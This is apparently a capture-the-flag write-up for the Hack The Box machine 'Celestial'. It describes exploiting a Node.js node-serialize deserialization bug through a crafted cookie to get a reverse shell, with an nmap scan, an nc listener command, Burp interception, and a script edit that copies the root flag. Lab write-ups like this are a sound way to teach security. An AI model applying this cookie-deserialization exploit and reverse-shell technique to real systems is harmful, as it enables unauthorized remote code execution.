Welcome to our first writeup of the hackthebox machine called Celestial (10.10.10.85) which comes under medium category so it was bit hard. This machine is purely based on Nodejs deserialization bug which leads to Remote code execution (RCE). So You’ve to google a bit for the source of the bug so that was just a hint. Let’s go deeper without wasting time and feel free to buy us a coffee ☕️

Buy me a coffee

First we will nmap the ip as there is no response in the browser.

nmap -sC -sV -oA celestial.nmap 10.10.10.85 which will give you the following result.

nmap result
                                                                                   nmap result

As you can see there’s only one service on port 3000 which is Node.js Express framework. so open 10.10.10.85:3000 and you’ll get something like ‘Hey dummy 2+2 is 22’ nothing elseopen up the cookie manager and looke at the cookie value which is double encoded URL and base64 encode.

                                                             cookie manager

Now here comes the main exploitation part and it’s tricky because first you’ve to understand the bug which is explained on Opsecx blog so don’t go further without understanding that bug. So download the require files from here which are nodejs.py and log.jsHere node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object.

As cookie is an untrusted input, an attacker can craft malicious cookie value to exploit this vulnerability. So here we will use nodejs.py to generate a reverse shell payload.

python nodejs.py [IP] [PORT] which will give you the following result.

Reverse shell

Here the IP will be the ‘tun0’ which you can get with ifconfig. Now you’ve the source of the reverse shell, copy the generated source into a log.js between the brackets → function(){HERE}

Here we will create a payload by using the serialize() function of the same module.

nodejs log.js which will give you the following result but just add the curve brackets at the end (Highlighted in the image).

Now open any proxy tool too intercept the browser request here we will use burpsuite to catch the request. Now just refresh 10.10.10.85:3000 and intercept the request, send it to repeater and encode the above generate the payload into base64, replace it with profile cookie value but do not send it. Star nc listener at the same time with nc -nlvp 4444 and then send the request from repeater, you’ll get the reverse shell like below.

ncshell

If you don’t get the shell repeat it few times because in some cases it takes 5–6 minutes to get the shell. here explore the given folders and you’ll get the user flag there and alongside you’ll find script.py too. So now to escalate the priviledges edit the script.py with nano like this.

privesc

echo “import os; os.system(‘cat /root/root.txt >> /home/sun/root.txt’)and you’ll get the root/system flag in the main directory. To have a better idea you can go through below video walkthrough of the box. Have a happy rooting 😃

LEAVE A REPLY

Please enter your comment!
Please enter your name here